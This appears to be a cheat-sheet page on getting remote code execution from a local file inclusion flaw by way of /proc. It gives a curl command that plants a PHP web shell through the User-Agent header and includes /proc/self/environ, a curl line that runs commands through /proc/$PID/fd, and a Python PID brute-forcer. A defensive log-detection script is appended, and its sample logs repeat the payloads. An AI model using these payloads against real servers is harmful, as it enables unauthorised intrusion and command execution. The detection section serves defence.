/proc is very special in that it is also a virtual filesystem. It's sometimes referred to as a process information pseudo-file system. It doesn't contain 'real' files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc).
It can be used to gain remote code execution through an LFI vulnerability.
Practice
As with a log file, send the payload in the User-Agent header: it may be reflected inside the /proc/self/environ file.
    # Sending a request to $URL with a malicious user-agent
    # Accessing the payload via LFI
    curl --user-agent "<?php passthru(\$_GET['cmd']); ?>" $URL/?parameter=../../../proc/self/environ
If you can upload files but don't know where they are located on the disk, you may use this method.
Upload a lot of shells (for example, 100), and then include /proc/$PID/fd/$FD through your LFI:
    # Accessing the payload via LFI
    curl "$URL?page=/proc/$PID/fd/$FD&cmd=id"
You can brute force the PID using this script, then adapt it to brute force the FD:
    import re

    import requests

    print("Running: ")
    # Try each candidate PID and read its cmdline through the LFI
    for x in range(0, 10000):
        url = "http://vulnerable.website/../../../../../../proc/" + str(x) + "/cmdline"
        r = requests.get(url)
        content = r.content
        length_of_resp = len(content)
        # Responses longer than 150 bytes are treated as a hit
        if length_of_resp > 150:
            print("FOUND PROCESS")
            print("URL:" + r.url)
            print("Length:" + str(length_of_resp))
            print("Result:", re.split("/cmdline/", str(content)))
            print("#####################################\n")
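Both techniques above are visible in web server access logs: requests whose decoded target reaches /proc/self/environ or /proc/$PID/fd/$FD, PHP tags in the User-Agent, and one client walking many PIDs. The following detection sketch is an added example, not part of the original page; the log lines are constructed, and the Combined Log Format, the threshold and all function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: ip - - [ts] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "(.*)"$')
PROC_RE = re.compile(r"/proc/+(self|\d+)/+(environ|cmdline|fd/+\d+)")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
ENUM_THRESHOLD = 3  # assumption: distinct PIDs from one client that count as enumeration

def fully_unquote(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (%252F -> %2F -> /)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def analyze(lines):
    """Return (alerts, enumerating_clients) for /proc-based LFI activity."""
    alerts, pids_by_ip = [], defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, agent = m.groups()
        hit = PROC_RE.search(fully_unquote(target))
        if hit:
            alerts.append((ip, "proc-include", hit.group(0)))
            if hit.group(1).isdigit():
                pids_by_ip[ip].add(int(hit.group(1)))
        if PHP_TAG_RE.search(agent):
            alerts.append((ip, "php-in-user-agent", agent))
    enumerators = {ip for ip, pids in pids_by_ip.items() if len(pids) >= ENUM_THRESHOLD}
    return alerts, enumerators

def _line(ip, target, agent="curl/8.0"):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{agent}"'

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    _line("203.0.113.5", "/?parameter=../../../proc/self/environ", "<?php passthru($_GET['cmd']); ?>"),
    _line("203.0.113.5", "/?page=%2Fproc%2F101%2Ffd%2F7&cmd=id"),
    _line("198.51.100.9", "/../../../proc/1/cmdline"),
    _line("198.51.100.9", "/../../../proc/2/cmdline"),
    _line("198.51.100.9", "/..%252F..%252Fproc%252F3%252Fcmdline"),
    _line("192.0.2.10", "/index.php?page=about", "Mozilla/5.0"),
]

if __name__ == "__main__":
    print(*analyze(SAMPLE), sep="\n")
```

Decoding before matching is what catches the encoded and double-encoded requests; a pattern applied to the raw log line would miss both.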